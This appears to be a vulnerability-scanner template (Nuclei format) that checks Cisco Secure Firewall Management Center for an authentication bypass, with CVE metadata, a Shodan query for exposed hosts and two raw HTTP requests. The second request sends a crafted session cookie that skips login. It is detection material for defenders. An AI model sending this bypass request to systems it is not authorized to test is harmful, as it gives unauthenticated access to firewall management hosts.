Cisco Secure Firewall Management Center - Authentication Bypass

id: CVE-2026-20079

info:
  name: Cisco Secure Firewall Management Center - Authentication Bypass
  author: theamanrawat
  severity: critical
  description: |
    Cisco Secure Firewall Management Center Software contains an authentication bypass caused by improper system process creation at boot, letting unauthenticated remote attackers execute scripts and gain root access, exploit requires crafted HTTP requests.
  impact: |
    Unauthenticated remote attackers can gain root access by executing scripts, leading to full system compromise.
  remediation: |
    Update to the latest available version.
  reference:
    - https://www.vulncheck.com/blog/cisco-fmc-auth-bypass-cve-2026-20079
    - https://nvd.nist.gov/vuln/detail/CVE-2026-20079
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2026-20079
    epss-score: 0.12808
    epss-percentile: 0.9411
    cwe-id: CWE-288
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"BackdraftSyncIntegration"
  tags: cve,cve2026,cisco,fmc,auth-bypass,rce,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /help/about.cgi HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(body, "Invalid session ID")'
        condition: and
        internal: true

  - raw:
      - |
        GET /help/about.cgi HTTP/1.1
        Host: {{Hostname}}
        Cookie: CGISESSID=csm_processes

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Cisco Secure Firewall Management Center", "Model", "OS", "Hostname")'
        condition: and
# digest: 4a0a0047304502205ff203445df73dfd7fa408ebd714003638c24f67dbe0cf8f54d79d3a183caba2022100fb6499c6ec52ff18ef219dd7c9872366c23811bcc34bd4ad8a6430e29eae543c:922c64590222798bb761d5b6d8e72950